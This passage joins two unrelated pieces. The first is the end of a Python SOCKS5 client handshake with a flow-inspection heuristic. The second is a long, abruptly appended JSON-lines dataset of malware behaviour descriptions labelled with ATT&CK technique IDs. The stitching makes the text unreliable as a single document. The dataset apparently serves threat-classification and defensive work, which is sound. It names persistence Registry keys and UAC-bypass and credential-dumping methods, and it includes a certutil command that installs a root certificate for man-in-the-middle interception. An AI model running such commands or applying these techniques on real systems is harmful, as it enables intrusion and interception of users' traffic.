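    """VER | NMETHODS | METHODS...  e.g. 05 01 00 offers 'no authentication'."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def parse_method_selection(data: bytes) -> int:
    """Server answer to the greeting: VER | METHOD."""
    if len(data) != 2 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 method selection: %r" % data)
    if data[1] == METHOD_NONE_ACCEPTABLE:
        raise ConnectionError("proxy accepted none of the offered methods")
    return data[1]


def connect_request(host: str, port: int) -> bytes:
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT for a CONNECT."""
    try:
        body = bytes([ATYP_IPV4]) + ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        name = host.encode("idna")
        body = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + body + struct.pack("!H", port)


def parse_reply(data: bytes) -> Tuple[int, str, int]:
    """Server reply: VER | REP | RSV | ATYP | BND.ADDR | BND.PORT -> (rep, addr, port)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply: %r" % data)
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        addr, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == ATYP_IPV6:
        addr, rest = str(ipaddress.IPv6Address(data[4:20])), data[20:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        addr, rest = data[5:5 + n].decode("idna"), data[5 + n:]
    else:
        raise ValueError("unknown ATYP 0x%02x" % atyp)
    return rep, addr, struct.unpack("!H", rest[:2])[0]


def run_handshake(send: Callable[[bytes], None], recv: Callable[[int], bytes],
                  host: str, port: int) -> Tuple[int, str, int]:
    """Drive the client side: greeting, method check, CONNECT, reply."""
    send(client_greeting())
    if parse_method_selection(recv(2)) != METHOD_NO_AUTH:
        raise ConnectionError("proxy demands authentication this client lacks")
    send(connect_request(host, port))
    header = recv(4)
    atyp = header[3]
    if atyp == ATYP_IPV4:
        body = recv(6)
    elif atyp == ATYP_IPV6:
        body = recv(18)
    elif atyp == ATYP_DOMAIN:
        length = recv(1)
        body = length + recv(length[0] + 2)
    else:
        raise ValueError("unknown ATYP 0x%02x" % atyp)
    return parse_reply(header + body)


def looks_like_socks5_greeting(payload: bytes) -> bool:
    """First-packet heuristic for flow inspection: VER=5 and NMETHODS bytes follow."""
    return len(payload) >= 2 and payload[0] == SOCKS_VERSION and len(payload) == 2 + payload[1]


if __name__ == "__main__":
    # Offline run against a scripted proxy (documentation addresses, constructed).
    sent, replies = [], iter([b"\x05\x00", b"\x05\x00\x00\x01", b"\x00\x00\x00\x00\x00\x00"])
    rep, bnd, bport = run_handshake(sent.append, lambda n: next(replies), "198.51.100.20", 81)
    print("client ->", [m.hex() for m in sent])
    print("result  :", REPLY_TEXT[rep], bnd, bport)
```

The first client message is always a tiny `05 NN ...` packet before any application data, which is why `looks_like_socks5_greeting` is a cheap first-packet test for an outbound flow on an unusual port such as the 1913 noted above; a TLS ClientHello, by contrast, starts with `16 03`.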
{"text1":"An downloader uses the Windows command \"cmd.exe\" \/C whoami. The group also uses a tool to execute commands on remote computers.","labels":"['T1059']"}
|
|
{"text1":"An downloader uses the Windows command \"cmd.exe\" \/C whoami to verify that it is running with the elevated privileges of \u201cSystem.\u201d","labels":"['T1033']"}
|
|
{"text1":"An executable dropped onto victims by aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe).","labels":"['T1055']"}
|
|
{"text1":"An HTTP malware variant decrypts strings using single-byte XOR keys.","labels":"['T1140']"}
|
|
{"text1":"An HTTP malware variant establishes persistence by setting the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\.","labels":"['T1547.001']"}
|
|
{"text1":"An HTTP malware variant used Base64 to encode communications to the C2 server.","labels":"['T1132']"}
|
|
{"text1":"An loader Trojan adds the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence.","labels":"['T1037']"}
|
|
{"text1":"An loader Trojan uses a batch script to run its payload.","labels":"['T1064']"}
|
|
{"text1":"An loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.","labels":"['T1057']"}
|
|
{"text1":"An older variant of performs UAC bypass.","labels":"['T1548.002']"}
|
|
{"text1":"An older version of has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.","labels":"['T1083']"}
|
|
{"text1":"An Port 22 malware variant registers itself as a service.","labels":"['T1543.003']"}
|
|
{"text1":"A payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.","labels":"['T1112']"}
|
|
{"text1":"A payload has searched all fixed drives on the victim for files matching a specified list of extensions.","labels":"['T1083']"}
|
|
{"text1":"A payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.","labels":"['T1055.012']"}
|
|
{"text1":"A payload was packed with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"APIs and strings in some variants are RC4 encrypted. Another variant is encoded with XOR.","labels":"['T1027']"}
|
|
{"text1":"apparently altered samples by adding four bytes of random letters in a likely attempt to change the file hashes.","labels":"['T1027.001', 'T1027.005']"}
|
|
{"text1":"appears to have functionality to modify remote Registry information.","labels":"['T1112']"}
|
|
{"text1":"appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.","labels":"['T1027']"}
|
|
{"text1":"appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.","labels":"['T1027.001']"}
|
|
{"text1":"As part of the data reconnaissance phase, grabs the system time to send back to the control server.","labels":"['T1124']"}
|
|
{"text1":"A system info module in gathers information on the victim host\u2019s configuration.","labels":"['T1082']"}
|
|
{"text1":"A tool can create a new service, naming it after the config information, to gain persistence.","labels":"['T1543.003']"}
|
|
{"text1":"A tool can encrypt payloads using XOR. malware is also obfuscated using Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1027']"}
|
|
{"text1":"A tool can read and decrypt stored Registry values.","labels":"['T1012']"}
|
|
{"text1":"A tool can spawn svchost.exe and inject the payload into that process.","labels":"['T1055']"}
|
|
{"text1":"A tool can use a public UAC bypass method to elevate privileges.","labels":"['T1548.002']"}
|
|
{"text1":"A tool can use WMI to execute a binary.","labels":"['T1047']"}
|
|
{"text1":"attempted to contact the C2 server over TCP using port 80.","labels":"['T1043']"}
|
|
{"text1":"attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.","labels":"['T1204']"}
|
|
{"text1":"attempted to get users to click on Microsoft Excel attachments containing malicious macro scripts.","labels":"['T1204']"}
|
|
{"text1":"attempted to get users to launch malicious attachments delivered via spearphishing emails.","labels":"['T1204']"}
|
|
{"text1":"attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.","labels":"['T1204']"}
|
|
{"text1":"attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.","labels":"['T1598.003']"}
|
|
{"text1":"attempted to use RDP to move laterally.","labels":"['T1021.001']"}
|
|
{"text1":"attempts to access the ADMIN$, C$\\Windows, D$\\Windows, and E$\\Windows shares on the victim with its current privileges.","labels":"['T1083']"}
|
|
{"text1":"attempts to add a shortcut file in the Startup folder to achieve persistence.","labels":"['T1547.009']"}
|
|
{"text1":"attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.","labels":"['T1547.001']"}
|
|
{"text1":"attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware.","labels":"['T1104']"}
|
|
{"text1":"attempts to bypass default User Account Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.","labels":"['T1548.002']"}
|
|
{"text1":"attempts to detect several anti-virus products.","labels":"['T1518.001']"}
|
|
{"text1":"attempts to disable UAC remote restrictions by modifying the Registry.","labels":"['T1548.002']"}
|
|
{"text1":"attempts to download an encrypted binary from a specified domain.","labels":"['T1105']"}
|
|
{"text1":"attempts to escalate privileges by bypassing User Account Control (UAC).","labels":"['T1548.002']"}
|
|
{"text1":"attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.","labels":"['T1068']"}
|
|
{"text1":"attempts to hide its payloads using legitimate filenames.","labels":"['T1036']"}
|
|
{"text1":"attempts to obtain legitimate credentials during operations.","labels":"['T1078']"}
|
|
{"text1":"attempts to overwrite operating system files with image files.","labels":"['T1070.004']"}
|
|
{"text1":"A uses an encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.","labels":"['T1027']"}
|
|
{"text1":"automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.","labels":"['T1119']"}
|
|
{"text1":"automatically searches for files on local drives based on a predefined list of file extensions.","labels":"['T1083']"}
|
|
{"text1":"automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.","labels":"['T1020']"}
|
|
{"text1":"A variant can force the compromised system to function as a proxy server.","labels":"['T1090']"}
|
|
{"text1":"A variant downloads the backdoor payload via the BITS service.","labels":"['T1197']"}
|
|
{"text1":"A variant encodes C2 POST data base64.","labels":"['T1132']"}
|
|
{"text1":"A variant has used DLL side-loading.","labels":"['T1574.002']"}
|
|
{"text1":"A variant has used rundll32 for execution.","labels":"['T1218.011']"}
|
|
{"text1":"A variant is encoded using a simple XOR cipher.","labels":"['T1027']"}
|
|
{"text1":"A variant of attempts communication to the C2 server over HTTP on port 443.","labels":"['T1043']"}
|
|
{"text1":"A variant of encrypts some C2 with 3DES and RSA.","labels":"['T1573']"}
|
|
{"text1":"A variant of executes dir C:\\progra~1 when initially run.","labels":"['T1083']"}
|
|
{"text1":"A variant uses a C2 mechanism similar to port knocking that allows attackers to connect to a victim without leaving the connection open for more than a few seconds.","labels":"['T1095']"}
|
|
{"text1":"A variant uses DLL search order hijacking.","labels":"['T1574.001']"}
|
|
{"text1":"A variant uses fake TLS to communicate with the C2 server.","labels":"['T1095']"}
|
|
{"text1":"A VBA Macro sets its file attributes to System and Hidden.","labels":"['T1564.001']"}
|
|
{"text1":"A VBScript receives a batch script to execute a set of commands in a command prompt.","labels":"['T1119']"}
|
|
{"text1":"A version of introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.","labels":"['T1027.001']"}
|
|
{"text1":"A version of loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.","labels":"['T1127']"}
|
|
{"text1":"avoids analysis by encrypting all strings, internal files, configuration data.","labels":"['T1027']"}
|
|
{"text1":"A Word document delivering prompts the user to enable macro execution.","labels":"['T1204']"}
|
|
{"text1":"Based on comparison of versions, made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.","labels":"['T1027.005']"}
|
|
{"text1":"beacons to destination port 443.","labels":"['T1043']"}
|
|
{"text1":"Before being appended to image files, commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.","labels":"['T1573']"}
|
|
{"text1":"Before writing to disk, inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.","labels":"['T1027.001']"}
|
|
{"text1":"binds and listens on port 1058.","labels":"['T1571']"}
|
|
{"text1":"binds and listens on port 443.","labels":"['T1043']"}
|
|
{"text1":"bypassed User Account Control (UAC).","labels":"['T1548.002']"}
|
|
{"text1":"bypasses UAC to escalate privileges by using a custom \u201cRedirectEXE\u201d shim database.","labels":"['T1548.002']"}
|
|
{"text1":"bypasses User Account Control (UAC) by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).","labels":"['T1548.002']"}
|
|
{"text1":"C2 messages are Base64-encoded.","labels":"['T1132']"}
|
|
{"text1":"C2 servers communicated with malware over TCP 8081, 8282, and 8083.","labels":"['T1571']"}
|
|
{"text1":"C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers.","labels":"['T1001']"}
|
|
{"text1":"C2 traffic can communicate via TCP raw sockets.","labels":"['T1095']"}
|
|
{"text1":"C2 traffic for most tools occurs over ports 53, 80, and 443.","labels":"['T1043']"}
|
|
{"text1":"C2 traffic from is encrypted, then encoded with Base64 encoding.","labels":"['T1132']"}
|
|
{"text1":"C2 traffic has been encrypted with RC4 and AES.","labels":"['T1573']"}
|
|
{"text1":"C2 traffic is base64-encoded.","labels":"['T1132']"}
|
|
{"text1":"C2 traffic is encrypted using bitwise NOT and XOR operations.","labels":"['T1573']"}
|
|
{"text1":"calls cmd.exe to run various DLL files via rundll32.","labels":"['T1218.011']"}
|
|
{"text1":"calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. also has the capability to invoke a reverse shell.","labels":"['T1059']"}
|
|
{"text1":"can accept multiple URLs for C2 servers.","labels":"['T1008']"}
|
|
{"text1":"can add a new service to ensure persists on the system when delivered as another payload onto the system.","labels":"['T1543.003']"}
|
|
{"text1":"can add or remove applications or ports on the Windows firewall or disable it entirely.","labels":"['T1562.001']"}
|
|
{"text1":"can alter the victim's proxy configuration.","labels":"['T1562.001']"}
|
|
{"text1":"can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.","labels":"['T1548.002']"}
|
|
{"text1":"can be added as a service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.","labels":"['T1090']"}
|
|
{"text1":"can be configured to use HTTP or DNS for command and control.","labels":"['T1071']"}
|
|
{"text1":"can be configured to use multiple network protocols to avoid network-based detection.","labels":"['T1026']"}
|
|
{"text1":"can be configured to use raw TCP or UDP for command and control.","labels":"['T1095']"}
|
|
{"text1":"can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.","labels":"['T1574.001']"}
|
|
{"text1":"can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.","labels":"['T1546.007']"}
|
|
{"text1":"can be used to copy files to a remotely connected system.","labels":"['T1105']"}
|
|
{"text1":"can be used to create to upload and\/or download files.","labels":"['T1105']"}
|
|
{"text1":"can be used to create to upload files from a compromised host.","labels":"['T1048']"}
|
|
{"text1":"can be used to delete files from the file system.","labels":"['T1070.004']"}
|
|
{"text1":"can be used to disable local firewall settings.","labels":"['T1562.001']"}
|
|
{"text1":"can be used to discover current NetBIOS sessions.","labels":"['T1049']"}
|
|
{"text1":"can be used to discover local NetBIOS domain names.","labels":"['T1016']"}
|
|
{"text1":"can be used to discover processes running on a system.","labels":"['T1057']"}
|
|
{"text1":"can be used to discover services running on a system.","labels":"['T1007']"}
|
|
{"text1":"can be used to discover system firewall settings.","labels":"['T1518.001']"}
|
|
{"text1":"can be used to display ARP configuration information on the host.","labels":"['T1016']"}
|
|
{"text1":"can be used to download files from a given URL.","labels":"['T1105']"}
|
|
{"text1":"can be used to dump credentials.","labels":"['T1003']"}
|
|
{"text1":"can be used to enumerate local network connections, including active TCP connections and other network statistics.","labels":"['T1049']"}
|
|
{"text1":"can be used to enumerate security software currently running on a system by process name of known products.","labels":"['T1518.001']"}
|
|
{"text1":"can be used to execute binaries on remote systems by creating and starting a service.","labels":"['T1569.002']"}
|
|
{"text1":"can be used to find files and directories with native functionality such as dir commands.","labels":"['T1083']"}
|
|
{"text1":"can be used to find information about the operating system.","labels":"['T1082']"}
|
|
{"text1":"can be used to gather information about the operating system.","labels":"['T1082']"}
|
|
{"text1":"can be used to identify remote systems within a network.","labels":"['T1018']"}
|
|
{"text1":"can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: certutil -addstore -f -user ROOT ProgramData\\cert512121.der.","labels":"['T1553.004']"}
|
|
{"text1":"can be used to locate certain types of files\/directories in a system (e.g. locate all files with a specific extension, name, and\/or age).","labels":"['T1083']"}
|
|
{"text1":"can be used to schedule a task on a system.","labels":"['T1053.005']"}
|
|
{"text1":"can be used to set up a proxy tunnel to allow remote host access to an infected host.","labels":"['T1090']"}
|
|
{"text1":"can be used to subvert controls and possibly conceal command execution by not directly invoking .","labels":"['T1202']"}
|
|
{"text1":"can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.","labels":"['T1548.002']"}
|
|
{"text1":"can capture a screenshot from a victim.","labels":"['T1113']"}
|
|
{"text1":"can capture desktop screenshots in the PNG format and send them to the C2 server.","labels":"['T1113']"}
|
|
{"text1":"can capture screenshots.","labels":"['T1113']"}
|
|
{"text1":"can capture screenshots at a configurable interval.","labels":"['T1113']"}
|
|
{"text1":"can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.","labels":"['T1113']"}
|
|
{"text1":"can capture screenshots of the victim\u2019s machine.","labels":"['T1113']"}
|
|
{"text1":"can capture the victim's screen.","labels":"['T1113']"}
|
|
{"text1":"can change Internet Explorer settings to reduce warnings about malware activity.","labels":"['T1562.001']"}
|
|
{"text1":"can collect CPU and architecture information from the victim\u2019s machine.","labels":"['T1082']"}
|
|
{"text1":"can collect data from a local system.","labels":"['T1005']"}
|
|
{"text1":"can collect data from user directories.","labels":"['T1005']"}
|
|
{"text1":"can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.","labels":"['T1082']"}
|
|
{"text1":"can communicate over a reverse proxy using SOCKS5.","labels":"['T1090']"}
|
|
{"text1":"can communicate over FTP and send email over SMTP.","labels":"['T1071']"}
|
|
{"text1":"can communicate over HTTP, SMTP, and POP3 for C2.","labels":"['T1071']"}
|
|
{"text1":"can communicate over HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"can communicate to its C2 over HTTP and HTTPS if directed.","labels":"['T1071']"}
|
|
{"text1":"can communicate to its C2 over TCP using a custom binary protocol.","labels":"['T1095']"}
|
|
{"text1":"can communicate using SOCKS.","labels":"['T1095']"}
|
|
{"text1":"can compress data with Zip before sending it over C2.","labels":"['T1560']"}
|
|
{"text1":"can conduct file browsing.","labels":"['T1083']"}
|
|
{"text1":"can create a directory (C:\\ProgramData\\Mail\\MailAg\\gl) to use as a temporary directory for uploading files.","labels":"['T1074']"}
|
|
{"text1":"can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.","labels":"['T1036']"}
|
|
{"text1":"can create a new service named msamger (Microsoft Security Accounts Manager).","labels":"['T1543.003']"}
|
|
{"text1":"can create a remote shell and run a given command.","labels":"['T1059']"}
|
|
{"text1":"can create a shortcut in the Windows startup folder for persistence.","labels":"['T1547.009', 'T1547.001']"}
|
|
{"text1":"can create backdoor accounts with the login \"HelpAssistant\" with the Limbo module.","labels":"['T1136']"}
|
|
{"text1":"can delete all Registry entries created during its execution.","labels":"['T1112']"}
|
|
{"text1":"can delete a specified file.","labels":"['T1070.004']"}
|
|
{"text1":"can delete files and directories.","labels":"['T1070.004']"}
|
|
{"text1":"can delete files and itself after infection to avoid analysis.","labels":"['T1070.004']"}
|
|
{"text1":"can delete files and optionally overwrite with random data beforehand.","labels":"['T1070.004']"}
|
|
{"text1":"can delete files off the system.","labels":"['T1070.004']"}
|
|
{"text1":"can delete files on the victim\u2019s machine.","labels":"['T1070.004']"}
|
|
{"text1":"can delete files written to disk.","labels":"['T1070.004']"}
|
|
{"text1":"can delete itself or specified files.","labels":"['T1070.004']"}
|
|
{"text1":"can delete malware and associated artifacts from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"can delete services from the victim\u2019s machine.","labels":"['T1543.003']"}
|
|
{"text1":"can delete specified files.","labels":"['T1070.004']"}
|
|
{"text1":"can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution.","labels":"['T1021.003']"}
|
|
{"text1":"can disable Avira anti-virus.","labels":"['T1562.001']"}
|
|
{"text1":"can disable Microsoft Office Protected View by changing Registry keys.","labels":"['T1562.001']"}
|
|
{"text1":"can discover and collect victim system information.","labels":"['T1082']"}
|
|
{"text1":"can download additional encrypted backdoors onto the victim via GIF files.","labels":"['T1105']"}
|
|
{"text1":"can download additional files.","labels":"['T1105']"}
|
|
{"text1":"can download additional files and payloads to compromised hosts.","labels":"['T1105']"}
|
|
{"text1":"can download additional files from URLs.","labels":"['T1105']"}
|
|
{"text1":"can download additional payloads onto the victim.","labels":"['T1105']"}
|
|
{"text1":"can download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"can download and execute an arbitrary executable.","labels":"['T1105']"}
|
|
{"text1":"can download and execute files.","labels":"['T1105']"}
|
|
{"text1":"can download and launch additional payloads.","labels":"['T1105']"}
|
|
{"text1":"can download and upload files to and from the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"can download and upload files to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"can download an executable to run on the victim.","labels":"['T1105']"}
|
|
{"text1":"can download files from its C2 server to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"can download files from remote servers.","labels":"['T1105']"}
|
|
{"text1":"can download files from the C2 server to the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"can download files off the target system to send back to the server.","labels":"['T1005']"}
|
|
{"text1":"can download files onto the victim.","labels":"['T1105']"}
|
|
{"text1":"can download files remotely.","labels":"['T1105']"}
|
|
{"text1":"can download or upload files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"can download remote files.","labels":"['T1105']"}
|
|
{"text1":"can download remote files and additional payloads to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"can download remote files onto victims.","labels":"['T1105']"}
|
|
{"text1":"can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.","labels":"['T1113']"}
|
|
{"text1":"can dump credentials.","labels":"['T1003']"}
|
|
{"text1":"can dump passwords and save them into \\ProgramData\\Mail\\MailAg\\pwds.txt.","labels":"['T1003']"}
|
|
{"text1":"can dump the SAM database.","labels":"['T1003']"}
|
|
{"text1":"can enable\/disable RDP connection and can start a remote desktop session using a browser web socket client.","labels":"['T1021.001']"}
|
|
{"text1":"can enable remote desktop on the victim's machine.","labels":"['T1021.001']"}
|
|
{"text1":"can encrypt C2 traffic with AES.","labels":"['T1573']"}
|
|
{"text1":"can enumerate active windows.","labels":"['T1010']"}
|
|
{"text1":"can enumerate and search for files and directories.","labels":"['T1083']"}
|
|
{"text1":"can enumerate drives and Remote Desktop sessions.","labels":"['T1049']"}
|
|
{"text1":"can enumerate drives and their types. It can also change file permissions using cacls.exe.","labels":"['T1083']"}
|
|
{"text1":"can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.","labels":"['T1033']"}
|
|
{"text1":"can enumerate processes.","labels":"['T1057']"}
|
|
{"text1":"can enumerate Registry keys.","labels":"['T1012']"}
|
|
{"text1":"can enumerate Registry values, keys, and data.","labels":"['T1012']"}
|
|
{"text1":"can establish persistence by adding a Scheduled Task named \"Microsoft Boost Kernel Optimization\".","labels":"['T1053.005']"}
|
|
{"text1":"can establish persistence by adding Registry Run keys.","labels":"['T1547.001']"}
|
|
{"text1":"can establish persistence by creating a .lnk file in the Start menu.","labels":"['T1547.001']"}
|
|
{"text1":"can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.","labels":"['T1547.009']"}
|
|
{"text1":"can establish persistence by creating a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"can establish persistence by setting the value \u201cShell\u201d with \u201cexplorer.exe, %malware_pathfile%\u201d under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.","labels":"['T1547.004']"}
|
|
{"text1":"can establish persistence through the system screensaver by configuring it to execute the malware.","labels":"['T1546.002']"}
|
|
{"text1":"can establish using an AppCertDLLs Registry key.","labels":"['T1546.009']"}
|
|
{"text1":"can establish using a Registry run key.","labels":"['T1547.001']"}
|
|
{"text1":"can execute a payload on a remote host with PowerShell. This technique does write any data to disk.","labels":"['T1059.001']"}
|
|
{"text1":"can execute a task to download a file.","labels":"['T1105']"}
|
|
{"text1":"can execute commands from its C2 server.","labels":"['T1059']"}
|
|
{"text1":"can execute commands on the victim.","labels":"['T1059']"}
|
|
{"text1":"can execute commands on the victim's machine.","labels":"['T1059']"}
|
|
{"text1":"can execute commands on victims.","labels":"['T1059']"}
|
|
{"text1":"can execute commands remotely by creating a new scheduled task on the remote system.","labels":"['T1053.005']"}
|
|
{"text1":"can execute commands remotely by creating a new service on the remote system.","labels":"['T1569.002']"}
|
|
{"text1":"can execute commands using a shell.","labels":"['T1059']"}
|
|
{"text1":"can execute commands using cmd.exe.","labels":"['T1059']"}
|
|
{"text1":"can execute commands with script as well as execute JavaScript.","labels":"['T1064']"}
|
|
{"text1":"can execute ipconfig on the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"can execute PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"can execute shell commands using cmd.exe.","labels":"['T1059']"}
|
|
{"text1":"can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.","labels":"['T1048']"}
|
|
{"text1":"can exploit vulnerabilities such as MS14-058.","labels":"['T1068']"}
|
|
{"text1":"can extract cached password hashes from a system\u2019s registry.","labels":"['T1003']"}
|
|
{"text1":"can function as a proxy to create a server that relays communication between the client and C&C server.","labels":"['T1090']"}
|
|
{"text1":"can gather a list of processes.","labels":"['T1057']"}
|
|
{"text1":"can gather a process list from the victim.","labels":"['T1057']"}
|
|
{"text1":"can gather browser usernames and passwords.","labels":"['T1003']"}
|
|
{"text1":"can gather information about TCP connection state.","labels":"['T1049']"}
|
|
{"text1":"can gather information about the host.","labels":"['T1082']"}
|
|
{"text1":"can gather information on the mapped drives, OS version, computer name, and memory size.","labels":"['T1082']"}
|
|
{"text1":"can gather information on the victim username.","labels":"['T1033']"}
|
|
{"text1":"can gather network share information.","labels":"['T1135']"}
|
|
{"text1":"can gather Registry values.","labels":"['T1012']"}
|
|
{"text1":"can gather system information, the computer name, OS version, drive and serial information from the victim's machine.","labels":"['T1082']"}
|
|
{"text1":"can gather the disk volume information.","labels":"['T1082']"}
|
|
{"text1":"can gather the IP address from the victim's machine.","labels":"['T1016']"}
|
|
{"text1":"can gather the victim computer name and serial number.","labels":"['T1082']"}
|
|
{"text1":"can gather the victim user name.","labels":"['T1033']"}
|
|
{"text1":"can gather victim drive information.","labels":"['T1083']"}
|
|
{"text1":"can gather victim proxy information.","labels":"['T1016']"}
|
|
{"text1":"can get a list of the processes and running tasks on the system.","labels":"['T1057']"}
|
|
{"text1":"can identify logged in users across the domain and view user sessions.","labels":"['T1033']"}
|
|
{"text1":"can identify system information, including battery status.","labels":"['T1082']"}
|
|
{"text1":"can inject a malicious DLL into a process.","labels":"['T1055']"}
|
|
{"text1":"can inject a variety of payloads into processes dynamically chosen by the adversary.","labels":"['T1055']"}
|
|
{"text1":"can install a new service.","labels":"['T1543.003']"}
|
|
{"text1":"can install encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll and HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs.","labels":"['T1112']"}
|
|
{"text1":"can install itself as a new service.","labels":"['T1543.003']"}
|
|
{"text1":"can interact with a victim\u2019s Outlook session and look through folders and emails.","labels":"['T1114']"}
|
|
{"text1":"can launch a remote shell to execute commands.","labels":"['T1059']"}
|
|
{"text1":"can launch cmd.exe to execute commands on the system.","labels":"['T1059']"}
|
|
{"text1":"can list all files on a system.","labels":"['T1083']"}
|
|
{"text1":"can list connected devices.","labels":"['T1120']"}
|
|
{"text1":"can list directories on a victim.","labels":"['T1083']"}
|
|
{"text1":"can list files and directories.","labels":"['T1083']"}
|
|
{"text1":"can list local and remote shared drives and folders over SMB.","labels":"['T1135']"}
|
|
{"text1":"can list running services.","labels":"['T1007']"}
|
|
{"text1":"can list information about files in a directory.","labels":"['T1083']"}
|
|
{"text1":"can list the running processes and get the process ID and parent process\u2019s ID.","labels":"['T1057']"}
|
|
{"text1":"can load a DLL using .","labels":"['T1218.011']"}
|
|
{"text1":"can load a DLL using the LoadLibrary API.","labels":"['T1129']"}
|
|
{"text1":"can log keystrokes.","labels":"['T1056']"}
|
|
{"text1":"can manipulate Registry keys.","labels":"['T1112']"}
|
|
{"text1":"can migrate into another process using reflective DLL injection.","labels":"['T1055']"}
|
|
{"text1":"can modify file or directory timestamps.","labels":"['T1070.006']"}
|
|
{"text1":"can modify service configurations.","labels":"['T1543.003']"}
|
|
{"text1":"can obtain a list of active connections and open ports.","labels":"['T1049']"}
|
|
{"text1":"can obtain a list of running processes on the victim\u2019s machine.","labels":"['T1057']"}
|
|
{"text1":"can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.","labels":"['T1134']"}
|
|
{"text1":"can obtain a list of smart card readers attached to the victim.","labels":"['T1120']"}
|
|
{"text1":"can obtain a process list from the victim.","labels":"['T1057']"}
|
|
{"text1":"can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.","labels":"['T1016']"}
|
|
{"text1":"can obtain information about process integrity levels.","labels":"['T1057']"}
|
|
{"text1":"can obtain information about running processes on the victim.","labels":"['T1057']"}
|
|
{"text1":"can obtain information about security software on the victim.","labels":"['T1518.001']"}
|
|
{"text1":"can obtain information about the current user.","labels":"['T1033']"}
|
|
{"text1":"can obtain information about the logged on user both locally and for Remote Desktop sessions.","labels":"['T1033']"}
|
|
{"text1":"can obtain information about the victim's IP address.","labels":"['T1016']"}
|
|
{"text1":"can obtain information on installed anti-malware programs.","labels":"['T1518.001']"}
|
|
